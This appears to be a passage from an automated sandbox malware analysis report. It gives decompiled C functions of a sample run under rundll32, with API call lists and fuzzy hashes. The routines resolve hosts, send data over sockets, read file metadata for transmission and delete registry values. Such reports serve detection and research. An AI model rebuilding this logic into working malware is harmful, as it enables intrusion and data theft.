                                                                                              										asm("int3");
                                                                                              										asm("int3");
                                                                                              										asm("int3");
                                                                                              										asm("int3");
                                                                                              										asm("int3");
                                                                                              										asm("int3");
                                                                                              										asm("int3");
                                                                                              										asm("int3");
                                                                                              										_push(_t104);
                                                                                              										_push(_t98);
                                                                                              										_t100 = _t88;
                                                                                              										L11();
                                                                                              										if((_a8 & 0x00000001) != 0) {
                                                                                              											_push(0x188);
                                                                                              											E04275B47(_t100);
                                                                                              										}
                                                                                              										return _t100;
                                                                                              									}
                                                                                              								} else {
                                                                                              									 *(_t97 + 0x180) = 0;
                                                                                              									 *(_t97 + 0x184) = 0;
                                                                                              									return _t97;
                                                                                              								}
                                                                                              							}
                                                                                              						}
                                                                                              					}
                                                                                              				}
                                                                                              			}




















                                                                                              0x04257f60
                                                                                              0x04257f60
                                                                                              0x04257f61
                                                                                              0x04257f65
                                                                                              0x04257f6b
                                                                                              0x04257f75
                                                                                              0x04257f7b
                                                                                              0x04257f7d
                                                                                              0x04257f82
                                                                                              0x042580e7
                                                                                              0x042580ec
                                                                                              0x00000000
                                                                                              0x04257f88
                                                                                              0x04257f8b
                                                                                              0x04257f8b
                                                                                              0x04257f8e
                                                                                              0x04257f91
                                                                                              0x04257f98
                                                                                              0x04257f9f
                                                                                              0x04257fa6
                                                                                              0x04257fae
                                                                                              0x04257fb5
                                                                                              0x04257fbc
                                                                                              0x04257fc3
                                                                                              0x04257fca
                                                                                              0x04257fd1
                                                                                              0x04257fd8
                                                                                              0x04257fdf
                                                                                              0x04257fe6
                                                                                              0x04257fed
                                                                                              0x04257ff4
                                                                                              0x04257ffb
                                                                                              0x04258004
                                                                                              0x0425800b
                                                                                              0x04258012
                                                                                              0x04258019
                                                                                              0x04258023
                                                                                              0x04258029
                                                                                              0x04258030
                                                                                              0x04258037
                                                                                              0x0425803c
                                                                                              0x0425803f
                                                                                              0x0425803f
                                                                                              0x04258042
                                                                                              0x04258044
                                                                                              0x0425804b
                                                                                              0x04258051
                                                                                              0x04258064
                                                                                              0x042580f1
                                                                                              0x042580f1
                                                                                              0x042580f6
                                                                                              0x00000000
                                                                                              0x0425806a
                                                                                              0x04258072
                                                                                              0x0425807c
                                                                                              0x04258086
                                                                                              0x04258090
                                                                                              0x04258096
                                                                                              0x04258098
                                                                                              0x0425809e
                                                                                              0x042580a1
                                                                                              0x042580fb
                                                                                              0x042580fb
                                                                                              0x04258100
                                                                                              0x00000000
                                                                                              0x042580a3
                                                                                              0x042580ab
                                                                                              0x042580ad
                                                                                              0x042580b5
                                                                                              0x04258105
                                                                                              0x04258105
                                                                                              0x0425810a
                                                                                              0x00000000
                                                                                              0x042580b7
                                                                                              0x042580bf
                                                                                              0x042580c1
                                                                                              0x042580c9
                                                                                              0x0425810f
                                                                                              0x0425810f
                                                                                              0x04258114
                                                                                              0x04258119
                                                                                              0x0425811a
                                                                                              0x0425811b
                                                                                              0x0425811c
                                                                                              0x0425811d
                                                                                              0x0425811e
                                                                                              0x0425811f
                                                                                              0x04258120
                                                                                              0x04258121
                                                                                              0x04258123
                                                                                              0x04258128
                                                                                              0x0425812e
                                                                                              0x04258130
                                                                                              0x04258130
                                                                                              0x04258135
                                                                                              0x0425813b
                                                                                              0x04258143
                                                                                              0x0425814c
                                                                                              0x04258154
                                                                                              0x0425815d
                                                                                              0x0425815d
                                                                                              0x04258165
                                                                                              0x0425816e
                                                                                              0x04258174
                                                                                              0x04258180
                                                                                              0x04258186
                                                                                              0x04258189
                                                                                              0x0425818e
                                                                                              0x04258193
                                                                                              0x04258196
                                                                                              0x0425819b
                                                                                              0x0425819e
                                                                                              0x042581a5
                                                                                              0x042581ac
                                                                                              0x042581ac
                                                                                              0x042581b3
                                                                                              0x042581b8
                                                                                              0x042581c1
                                                                                              0x042581c2
                                                                                              0x042581c9
                                                                                              0x042581ba
                                                                                              0x042581bb
                                                                                              0x042581bf
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x042581bf
                                                                                              0x04258167
                                                                                              0x04258167
                                                                                              0x0425816c
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0425816c
                                                                                              0x04258156
                                                                                              0x04258156
                                                                                              0x0425815b
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0425815b
                                                                                              0x042581ca
                                                                                              0x042581ca
                                                                                              0x042581cf
                                                                                              0x042581d4
                                                                                              0x042581d4
                                                                                              0x042581d9
                                                                                              0x042581de
                                                                                              0x042581de
                                                                                              0x042581e3
                                                                                              0x042581e8
                                                                                              0x042581e8
                                                                                              0x042581ed
                                                                                              0x042581f2
                                                                                              0x042581f3
                                                                                              0x042581f4
                                                                                              0x042581f5
                                                                                              0x042581f6
                                                                                              0x042581f7
                                                                                              0x042581f8
                                                                                              0x042581f9
                                                                                              0x042581fa
                                                                                              0x042581fb
                                                                                              0x042581fc
                                                                                              0x042581fd
                                                                                              0x042581fe
                                                                                              0x042581ff
                                                                                              0x04258200
                                                                                              0x04258203
                                                                                              0x04258204
                                                                                              0x04258206
                                                                                              0x0425820f
                                                                                              0x04258211
                                                                                              0x04258217
                                                                                              0x0425821c
                                                                                              0x04258223
                                                                                              0x04258223
                                                                                              0x042580cb
                                                                                              0x042580cb
                                                                                              0x042580d8
                                                                                              0x042580e4
                                                                                              0x042580e4
                                                                                              0x042580c9
                                                                                              0x042580b5
                                                                                              0x042580a1
                                                                                              0x04258064

                                                                                              APIs
                                                                                              • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,?,04258B27,0429E048,?), ref: 04257F7B
                                                                                                • Part of subcall function 0425ABB0: HeapCreate.KERNEL32(00000004,00000000,00000000,74D0F5E0,00000004,04258329,?,04258B6E,0429E024,?), ref: 0425ABD5
                                                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(0000014C,00000000,?,04258B27,0429E048,?), ref: 0425805C
                                                                                              • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,04258B27,0429E048,?), ref: 04258096
                                                                                              • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,04258B27,0429E048,?), ref: 042580AB
                                                                                              • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 042580BF
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Create$Event$CountCriticalHeapInitializeSectionSpin
                                                                                              • String ID:
                                                                                              • API String ID: 1949328396-0
                                                                                              • Opcode ID: cbabc816223b4a4bd5f4b9aced95f05401b6e759fb57a6a14929dda6c5a6a483
                                                                                              • Instruction ID: e2c680f908fa1e9cd080441328c3517491733f93bf514a7f752a453f616af889
                                                                                              • Opcode Fuzzy Hash: cbabc816223b4a4bd5f4b9aced95f05401b6e759fb57a6a14929dda6c5a6a483
                                                                                              • Instruction Fuzzy Hash: 5F4190B0250B01ABF330AF65CD55B47BBE4AF00758F10491DE69AAA6D0D7F6B148CF94
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 28%
                                                                                              			E0426D160(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags, signed short* _a4) {
                                                                                              				signed int _v8;
                                                                                              				intOrPtr _v12;
                                                                                              				signed int _v28;
                                                                                              				signed int _v32;
                                                                                              				signed int _v36;
                                                                                              				intOrPtr _v40;
                                                                                              				intOrPtr _v44;
                                                                                              				char _v48;
                                                                                              				char _v52;
                                                                                              				signed short _v60;
                                                                                              				char _v176;
                                                                                              				char _v180;
                                                                                              				intOrPtr _v184;
                                                                                              				intOrPtr _v188;
                                                                                              				char _v200;
                                                                                              				intOrPtr _v204;
                                                                                              				void* __ebp;
                                                                                              				signed int _t27;
                                                                                              				char* _t33;
                                                                                              				signed short _t35;
                                                                                              				signed short* _t44;
                                                                                              				intOrPtr _t55;
                                                                                              				signed short _t60;
                                                                                              				char* _t65;
                                                                                              				void* _t66;
                                                                                              				signed int _t70;
                                                                                              				signed int _t72;
                                                                                              
                                                                                              				_t72 = (_t70 & 0xfffffff8) - 0xb4;
                                                                                              				_t27 =  *0x42a4008; // 0xd33db39d
                                                                                              				_v8 = _t27 ^ _t72;
                                                                                              				_t44 = _a4;
                                                                                              				asm("xorps xmm0, xmm0");
                                                                                              				asm("movups [esp+0xa0], xmm0");
                                                                                              				asm("movups [ebx+0x2], xmm0");
                                                                                              				asm("movq [ebx+0x12], xmm0");
                                                                                              				_t44[0xd] = 0;
                                                                                              				_v36 =  *_t44 & 0x0000ffff;
                                                                                              				_v184 = __edx;
                                                                                              				_v44 = 0;
                                                                                              				asm("movq [esp+0xb8], xmm0");
                                                                                              				_v12 = 0;
                                                                                              				_v40 = 0x100;
                                                                                              				_v180 =  &_v176;
                                                                                              				E0426D5B0( &_v176, _t44,  &_v180, __edi, __esi, __ecx, 3);
                                                                                              				_t33 =  &_v48;
                                                                                              				__imp__getaddrinfo(_v188, 0, _t33,  &_v52, __edi, __esi, __ebx);
                                                                                              				_t65 = _t33;
                                                                                              				_t34 = _v204;
                                                                                              				if(_v204 !=  &_v200) {
                                                                                              					L0427ED17(_t34);
                                                                                              					_t72 = _t72 + 4;
                                                                                              				}
                                                                                              				if(_t65 == 0) {
                                                                                              					_t60 = _v60;
                                                                                              					_t66 = 0;
                                                                                              					_t35 = _t60;
                                                                                              					if(_t60 != 0) {
                                                                                              						asm("o16 nop [eax+eax]");
                                                                                              						while(1) {
                                                                                              							_t55 =  *((intOrPtr*)(_t35 + 4));
                                                                                              							if(_t55 == 2 || _t55 == 0x17) {
                                                                                              								break;
                                                                                              							}
                                                                                              							_t35 =  *(_t35 + 0x1c);
                                                                                              							if(_t35 != 0) {
                                                                                              								continue;
                                                                                              							} else {
                                                                                              							}
                                                                                              							goto L11;
                                                                                              						}
                                                                                              						_t35 = E0427E060(_t44,  *((intOrPtr*)(_t35 + 0x18)),  *((intOrPtr*)(_t35 + 0x10)));
                                                                                              						_t72 = _t72 + 0xc;
                                                                                              						_t66 = 1;
                                                                                              					}
                                                                                              					L11:
                                                                                              					__imp__freeaddrinfo(_t60);
                                                                                              					if(_t66 == 0) {
                                                                                              						__imp__#112();
                                                                                              						return E04275AFE(_v32 ^ _t72, 0x2af9);
                                                                                              					} else {
                                                                                              						__imp__#9();
                                                                                              						_t44[1] = _t35;
                                                                                              						return E04275AFE(_v32 ^ _t72, _v204);
                                                                                              					}
                                                                                              				} else {
                                                                                              					__imp__#112();
                                                                                              					return E04275AFE(_v28 ^ _t72, _t65);
                                                                                              				}
                                                                                              			}






























                                                                                              0x0426d166
                                                                                              0x0426d16c
                                                                                              0x0426d173
                                                                                              0x0426d17b
                                                                                              0x0426d17e
                                                                                              0x0426d183
                                                                                              0x0426d18d
                                                                                              0x0426d192
                                                                                              0x0426d19b
                                                                                              0x0426d1a4
                                                                                              0x0426d1af
                                                                                              0x0426d1b3
                                                                                              0x0426d1be
                                                                                              0x0426d1c7
                                                                                              0x0426d1d2
                                                                                              0x0426d1dd
                                                                                              0x0426d1e1
                                                                                              0x0426d1ee
                                                                                              0x0426d1fc
                                                                                              0x0426d202
                                                                                              0x0426d208
                                                                                              0x0426d20e
                                                                                              0x0426d211
                                                                                              0x0426d216
                                                                                              0x0426d216
                                                                                              0x0426d21b
                                                                                              0x0426d23b
                                                                                              0x0426d242
                                                                                              0x0426d244
                                                                                              0x0426d248
                                                                                              0x0426d24a
                                                                                              0x0426d250
                                                                                              0x0426d250
                                                                                              0x0426d256
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0426d25d
                                                                                              0x0426d262
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0426d264
                                                                                              0x00000000
                                                                                              0x0426d262
                                                                                              0x0426d26d
                                                                                              0x0426d272
                                                                                              0x0426d275
                                                                                              0x0426d275
                                                                                              0x0426d27a
                                                                                              0x0426d27b
                                                                                              0x0426d283
                                                                                              0x0426d2af
                                                                                              0x0426d2cb
                                                                                              0x0426d285
                                                                                              0x0426d289
                                                                                              0x0426d28f
                                                                                              0x0426d2a9
                                                                                              0x0426d2a9
                                                                                              0x0426d21d
                                                                                              0x0426d21e
                                                                                              0x0426d23a
                                                                                              0x0426d23a

                                                                                              APIs
                                                                                              • getaddrinfo.WS2_32(?,00000000,00000000,?), ref: 0426D1FC
                                                                                              • WSASetLastError.WS2_32(00000000), ref: 0426D21E
                                                                                              • FreeAddrInfoW.WS2_32(?), ref: 0426D27B
                                                                                              • htons.WS2_32(?), ref: 0426D289
                                                                                              • WSASetLastError.WS2_32(00002AF9), ref: 0426D2AF
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$AddrFreeInfogetaddrinfohtons
                                                                                              • String ID:
                                                                                              • API String ID: 3326967445-0
                                                                                              • Opcode ID: d1da7fe8723c3597b7be25b2c4b3aba00815c571ea2a361bfe7d186734e5cc30
                                                                                              • Instruction ID: db971c9396e2296312a0221ccf25f67dc72facde332584cbb4e09c5c7909f794
                                                                                              • Opcode Fuzzy Hash: d1da7fe8723c3597b7be25b2c4b3aba00815c571ea2a361bfe7d186734e5cc30
                                                                                              • Instruction Fuzzy Hash: A841B472B283448BD720DF54E885BABB3E4FF99314F05466DE84A87251EB30E884C793
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 47%
                                                                                              			E04274A50(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, intOrPtr _a4) {
                                                                                              				signed int _v8;
                                                                                              				void* _v12;
                                                                                              				intOrPtr _v16;
                                                                                              				signed int _t36;
                                                                                              				long _t40;
                                                                                              				void** _t43;
                                                                                              				long _t46;
                                                                                              				void* _t49;
                                                                                              				intOrPtr _t53;
                                                                                              				LONG* _t57;
                                                                                              				void** _t64;
                                                                                              				void* _t67;
                                                                                              				signed int _t69;
                                                                                              
                                                                                              				_t36 =  *0x42a4008; // 0xd33db39d
                                                                                              				_v8 = _t36 ^ _t69;
                                                                                              				_t53 = _a4;
                                                                                              				_v16 = __ecx;
                                                                                              				if( *((intOrPtr*)(_t53 + 0x8c)) <= 0) {
                                                                                              					return E04275AFE(_v8 ^ _t69);
                                                                                              				} else {
                                                                                              					_t57 = _t53 + 0x44;
                                                                                              					do {
                                                                                              						_t67 =  *(_t53 + 0x90);
                                                                                              						if(_t67 ==  *(_t53 + 0x94)) {
                                                                                              							if(_t67 != 0) {
                                                                                              								 *(_t53 + 0x90) = 0;
                                                                                              								 *(_t53 + 0x94) = 0;
                                                                                              								goto L6;
                                                                                              							}
                                                                                              						} else {
                                                                                              							_t49 =  *(_t67 + 0x2c);
                                                                                              							 *(_t53 + 0x90) = _t49;
                                                                                              							 *(_t49 + 0x30) = 0;
                                                                                              							L6:
                                                                                              							if(_t67 != 0) {
                                                                                              								 *(_t67 + 0x2c) = 0;
                                                                                              								 *(_t67 + 0x30) = 0;
                                                                                              								 *((intOrPtr*)(_t53 + 0x8c)) =  *((intOrPtr*)(_t53 + 0x8c)) - 1;
                                                                                              							}
                                                                                              						}
                                                                                              						_t40 =  *(_t67 + 0x1c);
                                                                                              						 *((intOrPtr*)(_t53 + 0x40)) =  *((intOrPtr*)(_t53 + 0x40)) - _t40;
                                                                                              						InterlockedExchangeAdd(_t57, _t40);
                                                                                              						 *((intOrPtr*)(_t67 + 0x34)) =  *((intOrPtr*)(_t53 + 0x88));
                                                                                              						_t43 =  &_v12;
                                                                                              						_v12 = 0;
                                                                                              						 *((intOrPtr*)(_t67 + 0x18)) = 3;
                                                                                              						 *(_t67 + 0x28) = 2;
                                                                                              						__imp__WSASend( *((intOrPtr*)(_t67 + 0x34)), _t67 + 0x1c, 1, _t43, 0, _t67, 0);
                                                                                              						if(_t43 != 0xffffffff) {
                                                                                              							_t64 = 0;
                                                                                              						} else {
                                                                                              							__imp__#111();
                                                                                              							_t64 = _t43;
                                                                                              						}
                                                                                              						if(InterlockedDecrement(_t67 + 0x28) == 0) {
                                                                                              							L14:
                                                                                              							_t46 = E0426C930(_v16 + 0xb0, _t67);
                                                                                              							if(_t46 == 0) {
                                                                                              								HeapFree( *( *(_t67 + 0x14)), _t46, _t67);
                                                                                              							}
                                                                                              							goto L16;
                                                                                              						} else {
                                                                                              							if(_t64 == 0) {
                                                                                              								goto L17;
                                                                                              							} else {
                                                                                              								if(_t64 != 0x3e5) {
                                                                                              									goto L14;
                                                                                              								}
                                                                                              								L16:
                                                                                              								if(_t64 == 0) {
                                                                                              									goto L17;
                                                                                              								}
                                                                                              							}
                                                                                              						}
                                                                                              						break;
                                                                                              						L17:
                                                                                              						_t57 = _t53 + 0x44;
                                                                                              					} while ( *((intOrPtr*)(_t53 + 0x8c)) > 0);
                                                                                              					return E04275AFE(_v8 ^ _t69);
                                                                                              				}
                                                                                              			}
















                                                                                              0x04274a56
                                                                                              0x04274a5d
                                                                                              0x04274a61
                                                                                              0x04274a64
                                                                                              0x04274a6e
                                                                                              0x04274b98
                                                                                              0x04274a74
                                                                                              0x04274a75
                                                                                              0x04274a80
                                                                                              0x04274a80
                                                                                              0x04274a8c
                                                                                              0x04274aa2
                                                                                              0x04274aa4
                                                                                              0x04274aae
                                                                                              0x00000000
                                                                                              0x04274aae
                                                                                              0x04274a8e
                                                                                              0x04274a8e
                                                                                              0x04274a91
                                                                                              0x04274a97
                                                                                              0x04274ab8
                                                                                              0x04274aba
                                                                                              0x04274abc
                                                                                              0x04274ac3
                                                                                              0x04274aca
                                                                                              0x04274aca
                                                                                              0x04274aba
                                                                                              0x04274ad0
                                                                                              0x04274ad6
                                                                                              0x04274adb
                                                                                              0x04274aea
                                                                                              0x04274aed
                                                                                              0x04274af9
                                                                                              0x04274b00
                                                                                              0x04274b07
                                                                                              0x04274b0e
                                                                                              0x04274b17
                                                                                              0x04274b23
                                                                                              0x04274b19
                                                                                              0x04274b19
                                                                                              0x04274b1f
                                                                                              0x04274b1f
                                                                                              0x04274b31
                                                                                              0x04274b3f
                                                                                              0x04274b49
                                                                                              0x04274b50
                                                                                              0x04274b59
                                                                                              0x04274b59
                                                                                              0x00000000
                                                                                              0x04274b33
                                                                                              0x04274b35
                                                                                              0x00000000
                                                                                              0x04274b37
                                                                                              0x04274b3d
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x04274b5f
                                                                                              0x04274b61
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x04274b61
                                                                                              0x04274b35
                                                                                              0x00000000
                                                                                              0x04274b63
                                                                                              0x04274b6a
                                                                                              0x04274b6a
                                                                                              0x04274b85
                                                                                              0x04274b85

                                                                                              APIs
                                                                                              • InterlockedExchangeAdd.KERNEL32(?,00004E20), ref: 04274ADB
                                                                                              • WSASend.WS2_32(?,00004E20,00000001,?,00000000,?,00000000), ref: 04274B0E
                                                                                              • WSAGetLastError.WS2_32 ref: 04274B19
                                                                                              • InterlockedDecrement.KERNEL32(00000002), ref: 04274B29
                                                                                              • HeapFree.KERNEL32(?,00000000,?,?), ref: 04274B59
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Interlocked$DecrementErrorExchangeFreeHeapLastSend
                                                                                              • String ID:
                                                                                              • API String ID: 930714758-0
                                                                                              • Opcode ID: 5bfd34bd41f033b959fec4272f363c2c6b0cddb7ff1a1de2aea6618cbb5776fa
                                                                                              • Instruction ID: c9f5958c59c5938a539a0914c7a5d31ef9b1b2f7129c180d320e6c1fcebd9a5f
                                                                                              • Opcode Fuzzy Hash: 5bfd34bd41f033b959fec4272f363c2c6b0cddb7ff1a1de2aea6618cbb5776fa
                                                                                              • Instruction Fuzzy Hash: 87416D71A10204DFDB20EF65D888BA6B7B8FF54304F054279DD0A8B285DB71B904CBA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 62%
                                                                                              			E04254FB0(intOrPtr __ecx, long _a4) {
                                                                                              				long _v8;
                                                                                              				intOrPtr _v12;
                                                                                              				short _t27;
                                                                                              				long _t28;
                                                                                              				signed int _t30;
                                                                                              				void* _t34;
                                                                                              				WCHAR* _t37;
                                                                                              				long _t44;
                                                                                              				short _t47;
                                                                                              				signed int _t52;
                                                                                              				void* _t54;
                                                                                              				void* _t56;
                                                                                              				WCHAR* _t58;
                                                                                              
                                                                                              				_v8 = 0;
                                                                                              				_t58 = _a4;
                                                                                              				_t44 = 0;
                                                                                              				_t46 = __ecx + 0x18;
                                                                                              				_v12 = __ecx;
                                                                                              				if(__ecx + 0x18 != _t58) {
                                                                                              					_push(0xffffffff);
                                                                                              					L042535F0(_t46, _t58, 0);
                                                                                              				}
                                                                                              				_t27 = _t58[0xa];
                                                                                              				_t52 = _t58[8];
                                                                                              				if(_t27 < 8) {
                                                                                              					_t47 = _t58;
                                                                                              				} else {
                                                                                              					_t47 =  *_t58;
                                                                                              				}
                                                                                              				if( *((short*)(_t47 + _t52 * 2 - 2)) == 0x5c) {
                                                                                              					L12:
                                                                                              					_t28 = 0xb + _t58[8] * 2;
                                                                                              					_a4 = _t28;
                                                                                              					_t54 = LocalAlloc(0x40, _t28);
                                                                                              					 *_t54 = 0x6a;
                                                                                              					 *((intOrPtr*)(_t54 + 1)) = _v8;
                                                                                              					 *((intOrPtr*)(_t54 + 5)) = _t44;
                                                                                              					_t30 = _t58[8];
                                                                                              					if(_t58[0xa] >= 8) {
                                                                                              						_t58 =  *_t58;
                                                                                              					}
                                                                                              					_t22 = _t54 + 9; // 0x9
                                                                                              					E0427E060(_t22, _t58, 2 + _t30 * 2);
                                                                                              					_push(0x3f);
                                                                                              					_push(_a4);
                                                                                              					_push(_t54);
                                                                                              					_t34 = E04251C60( *((intOrPtr*)(_v12 + 4)));
                                                                                              					LocalFree(_t54);
                                                                                              					return _t34;
                                                                                              				} else {
                                                                                              					if(_t27 < 8) {
                                                                                              						_t37 = _t58;
                                                                                              					} else {
                                                                                              						_t37 =  *_t58;
                                                                                              					}
                                                                                              					_t56 = CreateFileW(_t37, 0x80000000, 1, 0, 3, 0x80, 0);
                                                                                              					if(_t56 != 0xffffffff) {
                                                                                              						_t44 = GetFileSize(_t56,  &_v8);
                                                                                              						CloseHandle(_t56);
                                                                                              						goto L12;
                                                                                              					} else {
                                                                                              						return 0;
                                                                                              					}
                                                                                              				}
                                                                                              			}
















                                                                                              0x04254fb8
                                                                                              0x04254fc1
                                                                                              0x04254fc4
                                                                                              0x04254fc6
                                                                                              0x04254fc9
                                                                                              0x04254fcf
                                                                                              0x04254fd1
                                                                                              0x04254fd5
                                                                                              0x04254fd5
                                                                                              0x04254fda
                                                                                              0x04254fdd
                                                                                              0x04254fe3
                                                                                              0x04254fe9
                                                                                              0x04254fe5
                                                                                              0x04254fe5
                                                                                              0x04254fe5
                                                                                              0x04254ff1
                                                                                              0x0425503d
                                                                                              0x04255040
                                                                                              0x0425504a
                                                                                              0x04255053
                                                                                              0x04255055
                                                                                              0x0425505b
                                                                                              0x0425505e
                                                                                              0x04255065
                                                                                              0x04255068
                                                                                              0x0425506a
                                                                                              0x0425506a
                                                                                              0x04255074
                                                                                              0x04255079
                                                                                              0x04255087
                                                                                              0x04255089
                                                                                              0x0425508c
                                                                                              0x0425508d
                                                                                              0x04255095
                                                                                              0x042550a3
                                                                                              0x04254ff3
                                                                                              0x04254ff6
                                                                                              0x04254ffc
                                                                                              0x04254ff8
                                                                                              0x04254ff8
                                                                                              0x04254ff8
                                                                                              0x04255017
                                                                                              0x0425501c
                                                                                              0x04255035
                                                                                              0x04255037
                                                                                              0x00000000
                                                                                              0x0425501e
                                                                                              0x04255026
                                                                                              0x04255026
                                                                                              0x0425501c

                                                                                              APIs
                                                                                              • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000007,?,?,?), ref: 04255011
                                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,?,?), ref: 0425502E
                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?), ref: 04255037
                                                                                              • LocalAlloc.KERNEL32(00000040,?,00000007,?,?,?), ref: 0425504D
                                                                                              • LocalFree.KERNEL32(00000000,00000000,?,0000003F,?,?,?), ref: 04255095
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: FileLocal$AllocCloseCreateFreeHandleSize
                                                                                              • String ID:
                                                                                              • API String ID: 1503672127-0
                                                                                              • Opcode ID: f2506c68b8f15581f367c057c16be48c8c06b3aefaf078d18dcefa7a1a13d8c9
                                                                                              • Instruction ID: b1b3dd49cf4c5019001c7c56c9ffd688082baacd1d50e33cd7c7aabe082c4333
                                                                                              • Opcode Fuzzy Hash: f2506c68b8f15581f367c057c16be48c8c06b3aefaf078d18dcefa7a1a13d8c9
                                                                                              • Instruction Fuzzy Hash: 8931AF31710214ABD720EFA8E888F6AF7B8FB48751F204629F905D7290D770BD55CBA4
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 64%
                                                                                              			E04260FE0(intOrPtr __ecx, intOrPtr* _a4, void* _a8) {
                                                                                              				void* _v8;
                                                                                              				long _v12;
                                                                                              				void* _v16;
                                                                                              				intOrPtr _v20;
                                                                                              				void* _v24;
                                                                                              				intOrPtr* _v28;
                                                                                              				char _v32;
                                                                                              				char _t33;
                                                                                              				short* _t36;
                                                                                              				void* _t37;
                                                                                              				long _t38;
                                                                                              				short* _t51;
                                                                                              				char* _t54;
                                                                                              				intOrPtr* _t58;
                                                                                              				short* _t60;
                                                                                              				void* _t61;
                                                                                              				void* _t62;
                                                                                              				int _t63;
                                                                                              				void* _t64;
                                                                                              				void* _t65;
                                                                                              				void* _t66;
                                                                                              
                                                                                              				_t61 = _a8;
                                                                                              				_t58 = _a4 + 1;
                                                                                              				_v20 = __ecx;
                                                                                              				_v28 = _t58;
                                                                                              				_v24 = 0;
                                                                                              				_t33 = _t61 - 1 + _t58;
                                                                                              				_v32 = _t33;
                                                                                              				if(_t33 - _t58 >= 4) {
                                                                                              					_v8 =  *_t58;
                                                                                              					_v28 = _t58 + 4;
                                                                                              				} else {
                                                                                              					_v24 = 1;
                                                                                              					_v8 = 0;
                                                                                              				}
                                                                                              				_t36 = E04260D20( &_v32);
                                                                                              				_t54 =  &_v32;
                                                                                              				_t51 = _t36;
                                                                                              				_t37 = E04260D20(_t54);
                                                                                              				_t60 = _t37;
                                                                                              				if(_v24 == 0) {
                                                                                              					_t38 = _t61 + 4;
                                                                                              					_v12 = _t38;
                                                                                              					_t62 = LocalAlloc(0x40, _t38);
                                                                                              					_v16 = _t62;
                                                                                              					E0427E060(_t62, _a4, _a8);
                                                                                              					_t66 = _t65 + 0xc;
                                                                                              					_t63 = 0;
                                                                                              					_a4 = _a8 + _t62;
                                                                                              					_a8 = 0;
                                                                                              					if(RegOpenKeyExW(_v8, _t51, 0, 0x102,  &_a8) == 0) {
                                                                                              						RegDeleteValueW(_a8, _t60);
                                                                                              						asm("sbb esi, esi");
                                                                                              						_t63 = 1;
                                                                                              						RegCloseKey(_a8);
                                                                                              					}
                                                                                              					_push(_t54);
                                                                                              					_push(0x3f);
                                                                                              					_push(_v12);
                                                                                              					 *_a4 = _t63;
                                                                                              					_t64 = _v16;
                                                                                              					_push(_t64);
                                                                                              					E04251C60( *((intOrPtr*)(_v20 + 4)));
                                                                                              					_t37 = LocalFree(_t64);
                                                                                              					if(_t51 != 0) {
                                                                                              						_t37 = E04275B0F(_t51);
                                                                                              						_t66 = _t66 + 4;
                                                                                              					}
                                                                                              					if(_t60 != 0) {
                                                                                              						return E04275B0F(_t60);
                                                                                              					}
                                                                                              				}
                                                                                              				return _t37;
                                                                                              			}
























                                                                                              0x04260feb
                                                                                              0x04260fee
                                                                                              0x04260ff0
                                                                                              0x04260ff3
                                                                                              0x04260ff9
                                                                                              0x04261000
                                                                                              0x04261002
                                                                                              0x0426100a
                                                                                              0x04261021
                                                                                              0x04261024
                                                                                              0x0426100c
                                                                                              0x0426100c
                                                                                              0x04261013
                                                                                              0x04261013
                                                                                              0x0426102a
                                                                                              0x0426102f
                                                                                              0x04261032
                                                                                              0x04261034
                                                                                              0x0426103d
                                                                                              0x0426103f
